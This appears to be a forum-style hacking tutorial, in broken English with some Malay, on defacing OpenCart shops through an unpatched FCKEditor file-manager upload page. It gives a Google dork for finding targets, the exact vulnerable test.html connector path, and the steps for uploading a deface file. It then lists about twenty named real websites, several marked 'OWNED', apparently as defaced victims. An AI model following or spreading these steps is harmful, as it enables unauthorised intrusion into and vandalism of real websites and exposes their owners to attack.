0
Actually we using FCKEditor techniques to deface websites, and admin websites are not to CHMOD / Protect their directory .. So, with this interchangeable me access to their directory and use FCKEditor to deface and giving security warning on the webmaster-webmaster .. So, i will show ways to deface websites using the FCKEditor, Follow the step below ..
1) Create your deface file first, using the extension. Html,
example deface.html
2) Search on Google, use this dork: Powered by OpenCart.
You may also add carian for certain domains, like. Com.
Example: Powered by OpenCart site:. Com
3) Exploit BGI OpenCart: / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html.
web search for one by one that has not been patched, and enter the above exploit.
Example: www.site.com / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html,
Example 2: www.site.com / cms / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html
4) Replace the connector: ASP to PHP, select the file, then upload.
5) Ok, so deface korang file will be like this.
Example: www.site.com / deface.html,
Website List:
http://bestonlinediscounts.net/ [OWNED]
http://wenrestaurant.com/ [OWNED]
http://ruthsgarden.com/ [OWNED]
http://www.utahflowers.net/ [UNAVAILABLE]
http://www.inlove.my/ [UNAVAILABLE]
http://megamall.com.pk/ [UNAVAILABLE]
http://stefanyboutique.com/ [UNAVAILABLE]
http://www.virtualgeorge.info/ [UNAVAILABLE]
http://iphoneclone.biz/ [UNAVAILABLE]
http://amourcristallis.com/ [UNAVAILABLE]
http://www.eesnet.org/ [UNAVAILABLE]
http://www.schoolshopper.com.au/ [OWNED]
http://www.mymaxi.nl/ [UNAVAILABLE]
http://wiretek.net/ [OWNED]
http://shop.tjokgus.com/ [OWNED]
http://www.aquariumsystem.it/ [UNAVAILABLE]
http://uae-shopper.com/ [UNAVAILABLE]
http://organicjewelries.com/ [OWNED]
http://www.granmasantiques.com/ [OWNED]
http://avocadogenie.com/ [UNAVAILABLE]
http://www.inputandanalysis.com/ [OWNED]
http://eddiegifts.com/ [OWNED]
0Awesome Comments!